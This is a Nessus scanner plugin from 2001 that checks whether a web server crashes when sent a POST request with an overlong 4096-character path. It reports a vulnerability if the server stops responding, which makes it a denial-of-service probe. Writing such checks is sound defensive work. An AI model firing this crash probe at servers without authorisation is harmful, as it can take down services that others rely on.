#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10687);
 
 name["english"] = "Too long POST command";
 script_name(english:name["english"]);
 
 desc["english"] = "
It *may* be possible to make this web server execute
arbitrary code by sending it a too long argument to
a POST command.

Risk factor : High

Solution : Upgrade your web server.";
 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Web server buffer overflow";
 summary["francais"] = "Dpassement de buffer dans un serveur web";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
 family["english"] = "Gain root remotely";
 family["francais"] = "Passer root  distance";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes");
  script_require_ports("Services/www",80);
 exit(0);
}

#
# The script code starts here
#

port = get_kb_item("Services/www");
if(!port)port = 80;

sock = open_sock_tcp(port);
mystr = http_get(item:"/", port:port);
send(socket:sock, data:mystr);
rcv = recv(socket:sock, length:1024);
if(!rcv) exit(0);
close(sock);

soc = open_sock_tcp(port);
if(!soc)exit(0);
req = string("/", crap(4096));
req = http_post(item:req, port:port);
send(socket:soc, data:req);
close(soc);

sleep(1);

soc2 = open_sock_tcp(port);
if(!soc2){
	security_hole(port);
	set_kb_item(name:"www/too_long_url_crash", value:TRUE);
	exit(0);
	}
req = http_get(item:"/", port:port);
send(socket:soc2, data:req);
r = recv(socket:soc2, length:1024);
close(soc2);

if(!r){
	security_hole(port);
	set_kb_item(name:"www/too_long_url_crash", value:TRUE);
      }



